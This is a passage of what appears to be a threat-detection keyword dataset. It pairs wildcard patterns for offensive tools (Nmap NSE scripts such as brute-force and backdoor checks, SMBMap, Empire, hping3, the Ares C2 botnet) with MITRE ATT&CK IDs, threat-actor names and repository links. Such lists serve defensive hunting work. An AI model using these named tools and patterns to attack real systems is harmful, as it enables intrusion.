- TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -* --host-file *.txt -u * --prompt --admin --no-banner*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -* hostmap-bfk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hostmap-crtsh.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hostmap-robtex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Hosts * -TopPorts *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Portscan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* hping3 *,offensive_tool_keyword,hping,hping3 is a network tool able to send 
custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -* http://localhost:8080 -o agent*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -* http_malleable*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* http-adobe-coldfusion-apsa1301.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-affiliate-id.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-apache-negotiation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-apache-server-status.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-aspnet-debug.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-auth-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-avaya-ipoffice-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-awstatstotals-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-axis2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-backup-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-barracuda-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-bigip-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cakephp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-chrono.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cisco-anyconnect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-coldfusion-subzero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-comments-displayer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-config-backup.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cookie-flags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cross-domain-policy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-csrf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-default-accounts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-devframework.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-dlink-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-dombased-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-domino-enum-passwords.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-drupal-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-drupal-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-errors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-exif-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-favicon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-feed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-fetch.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-fileupload-exploiter.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-form-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-form-fuzzer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-frontpage-login.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-git.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-gitweb-projects-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-google-malware.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-grep.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-hp-ilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-huawei-hg5xx-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-icloud-findmyiphone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-icloud-sendmsg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-iis-short-name-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-iis-webdav-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-internal-ip-disclosure.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-joomla-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
